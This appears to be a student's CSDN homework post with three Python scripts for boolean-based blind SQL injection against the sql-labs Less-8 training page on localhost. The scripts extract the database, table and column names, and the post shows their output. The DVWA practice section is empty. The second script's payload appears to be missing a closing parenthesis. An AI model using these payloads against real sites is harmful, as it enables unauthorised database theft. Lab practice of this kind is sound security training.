安全作业第二次

最新推荐文章于 2024-08-15 09:23:50 发布
最新推荐文章于 2024-08-15 09:23:50 发布
阅读量63 收藏
点赞数
文章标签: 安全 数据库 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56175122/article/details/122384693
版权
本文介绍了使用Python脚本完成SQL注入的过程,包括针对sql-labs第八关的自动化注入,通过group_concat函数获取数据库、表名及列名。同时提到了在DVWA中进行SQL注入的低级别练习。
摘要由CSDN通过智能技术生成

1.完成sql注入的python脚本编写
2.完成dvwas中sql注入模块的练习

使用python来进项对sql-labs第八关进行python自动化的注入

sql注入的语句:

database()
select group_concat(table_name) from information_schema.tables where table_schema='security'
select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'
python注入的脚本
先把库注入出来:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2022/1/5 0:15
# @Author  : 李振辉
# @File    : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
    }
resp=requests.get(url,headers=headers)
get_length_payload="' and length(database())={}--+"
for x in range(1,50):
    exec_url=url+get_length_payload.format(x)
    respon=requests.get(exec_url,headers=headers)
    if(resp.text==respon.text):
        print("该数据长度为{}".format(x))
        break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="'  and ascii(substr(database(),{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
    for char in chars:
        exec_url=url+get_data_payload.format(i,ord(char))
        payload_response=requests.get(exec_url,headers=headers)
        if payload_response.text==resp.text:
            result_data=result_data+char
            break
print("该数据是{}".format(result_data))


测试结果:

该数据长度为8

该数据是security

再把表注入出来

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2022/1/5 0:15
# @Author  : 李振辉
# @File    : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
    }
resp=requests.get(url,headers=headers)
get_length_payload="' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))={}--+"
for x in range(1,50):
    exec_url=url+get_length_payload.format(x)
    respon=requests.get(exec_url,headers=headers)
    if(resp.text==respon.text):
        print("该数据长度为{}".format(x))
        break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="'  and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security',{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
    for char in chars:
        exec_url=url+get_data_payload.format(i,ord(char))
        payload_response=requests.get(exec_url,headers=headers)
        if payload_response.text==resp.text:
            result_data=result_data+char
            break
print("该数据是{}".format(result_data))


 测试结果:

该数据长度为29

该数据是emails,referers,uagents,users

注入列

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2022/1/5 0:15
# @Author  : 李振辉
# @File    : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
    }
resp=requests.get(url,headers=headers)
get_length_payload="' and length((select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'))={}--+"
for x in range(1,50):
    exec_url=url+get_length_payload.format(x)
    respon=requests.get(exec_url,headers=headers)
    if(resp.text==respon.text):
        print("该数据长度为{}".format(x))
        break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="'  and ascii(substr((select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'),{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
    for char in chars:
        exec_url=url+get_data_payload.format(i,ord(char))
        payload_response=requests.get(exec_url,headers=headers)
        if payload_response.text==resp.text:
            result_data=result_data+char
            break
print("该数据是{}".format(result_data))


测试结果

该数据长度为20

该数据是ID,username,password

dvmas 的sql注入的练习

low:

 

Ustinian....
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全作业6
C3395176206的博客
07-30 845
安全作业6
安全作业1
C3395176206的博客
07-10 97
状态码,https如何实现非对称加密传输对称密钥,dns解析过程
网络安全技术与实践第二次作业
m0_52014276的博客
09-12 1977
1.在TCP了解建立的3步握手阶段,攻击者为什么可以成功实施SNY Flood攻击?在实际中,如何防范此类攻击? 答:①:攻击者不断向服务器的监听端口发送建立TCP连接的请求SYN数据包,但是收到服务器的SYN包后却不回复ACK确认信息,每次操作都会使服务器端保留一个半开放的连接,当这些半开放连接填满服务器的连接队列时,服务器便不再接受后续的任何连接请求,这种攻击属于拒绝服务攻击。 ②:防御这类攻击的主要思路是在服务器前端部署相应的网络安全设备对SYN FLOOD攻击数据包进行过滤。 2.黑客为什么可以成功
sdau启航第二次作业
qq_62725148的博客
05-22 1万+
笔记: Css在style标签下 选择器{样式} 给谁改样式{什么样式} <style> p{color: rgb(215, 72, 72);} </style> Color改变颜色font-size更改字体大小 Css主要由两部分组成选择器以及一条或多条声明 属性与属性之间要用:分割结尾用; 1.Css、样式格式代码风格: 展开型书写 用小写字母书写 属性值前面,冒号后面保留一个空格;选择器后面保留一个空格 2.选择器: 选择某个
工程伦理第二次作业
热门推荐
yaojunjie2010
10-20 2万+
“明乎经变之事,然后知轻重之分,可与适权矣”,这句话给我们的启示是,在工程职业实践中遇到伦理困境时,工程伦理的规范性要求是“经”,()是“权”,工程师在现实的工程实践情境中应该做到原则性与灵活性的统一。 A、对职业章程的规范要求因时因境作出变通和调整 B、无条件遵循职业伦理章程的规范要求去行动 C、按照约定俗成的标准或以往的经验去行动 D、服从上级的命令去行动 正确答案:A 从工程师现实的职业行为过程看,职业章程的规范引导与他对具体工作实践场景的分析、判断,以及特定情景中可能的行为方式的权衡、选择等,都
第二次作业.zip
03-24
在这个场景中,我们关注的是一个名为"第二次作业.zip"的压缩包文件。这个文件很可能是某个课程或项目的一部分,由学生或团队成员提交,用于展示他们的工作成果。ZIP是流行的压缩格式之一,它支持多个文件和文件夹的...
安全文明施工二次策划.docx
03-01
安全文明施工二次策划】是建筑工程领域中一项重要的管理措施,旨在确保施工过程中的人身安全、设备完整以及环境保护。这份策划文档详细阐述了安全管理的方针、目标、组织机构及其职责,以及安全体系的构建和执行...
操作系统第二次作业答案
07-06
### 操作系统第二次作业知识点解析 #### 一、选择题知识点解析 1. **虚拟存储器容量** - **知识点**: 虚拟存储器的容量由计算机的地址结构决定。对于32位地址的CPU而言,其最大能寻址的空间为\(2^{32}\)个地址...
第二次作业6
08-08
在【标题】"第二次作业6"和【描述】中,我们关注的是函数形参(形式参数)和实参(实际参数)之间的匹配规则以及类型转换,特别是涉及到`getPower`函数的例子。让我们详细讨论这两个概念。 **函数形参的类型和个数...
等保测评中的安全需求分析:构建精准的信息安全防护体系
最新发布
w13359990065的博客
08-15 514
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 574
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
[Linux]车联网安全-大佬都在用的渗透测试系统
Liyu_6618的博客
08-12 291
天刃是一个基于Ubuntu 18.04的车联网渗透测试发行版系统,主要用于针对车联网设备进行安全评估。系统内置上百个车联网安全测试专用工具,旨在解决车联网安全从业人员测试工具杂乱、测试环境配置复杂、无工具可用等一系列问题。本系统提供ISO镜像安装与OVA镜像导入方式安装,推荐使用OVA导入虚拟机操作更为简单方便。覆盖逆向、CAN、车载以太网、WiFi、蓝牙、云平台等安全测试。导入或安装成功后开机使用iov/root进行登录,登录成功后会显示用户体验计划,可选择同意或拒绝,确认完成后即可开始使用。
ctf 堆栈结构
qq_69100706的博客
08-12 364
CTF(Capture The Flag)竞赛中,理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。
Scout Suite:开源云安全审计工具
网络研究观
08-12 288
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
奥运会期间网络安全防护的重要性
gmqqcsdn的博客
08-12 493
它为运动员提供了公平竞争的舞台,为观众带来了精彩的观赛体验,也维护了奥运会的尊严和声誉。想象一下,如果奥运会的官方网站被黑客攻击,发布了虚假的赛事结果或负面信息,那将对奥运会的公信力造成极大的冲击。赛事的组织协调、运动员的信息管理、观众的票务与服务,无一不依赖于网络的稳定运行。通过强大的网络安全防护体系,能够及时检测和抵御这些威胁,保障网络的正常运行。北京时间凌晨3点,历史17天的巴黎奥运会迎来落幕,在此先祝贺伟大的祖国获得了总奖牌榜第二,金牌榜并列第一的好成绩,对征战在奥运会赛场的运动健儿们致敬!
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 733
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 491
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
漏洞复现-hutool XML反序列化漏洞(CVE-2023-24162)
玄道的网安博客
08-12 288
Hutool 中的XmlUtil.readObjectFromXml方法直接封装调用XMLDecoder.readObject解析xml数据,当使用 readObjectFromXml 去处理恶意的 XML 字符串时会造成任意代码执行。在最新版的 hutool-all 没有用黑名单,而是直接移除了 readObjectFromXml方法cn.hutool.core.util.XmlUtil#readObjectFromXml(java.lang.String)当然这个地方也是可以通过读取文件来实现的。
超网和无类间路由是什么?
m0_73609283的博客
08-14 766
CIDR允许更灵活的IP地址分配,减少了地址空间的浪费。例如,一个企业可能需要一个完整的B类地址空间(65536个地址),但又超过了C类地址空间(256个地址)在这种情况下,CIDR可以明确分配一个合理的地址范围(如1024个地址),从而避免地址的浪费。无类间路由(CIDR)是一种新的IP地址分配方法,取代了传统的基于类的分配方法。通过合并连续的子网,超网可以减少路由入侵的数量,从而提高网络的效率。总之,超网和无类间路由技术提高了IP地址的利用效率,还简化了路由表管理,支持网络的灵活扩展。
计算机应用基础第二次作业-王亭亭
"计算机应用基础(第二次作业)-王亭亭-江苏开放大学" 这篇文档看起来是江苏开放大学一门名为“计算机应用基础”的专科课程的第二次作业。由于提供的内容并不直接包含具体的计算机应用基础知识,而是由一系列无明显...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值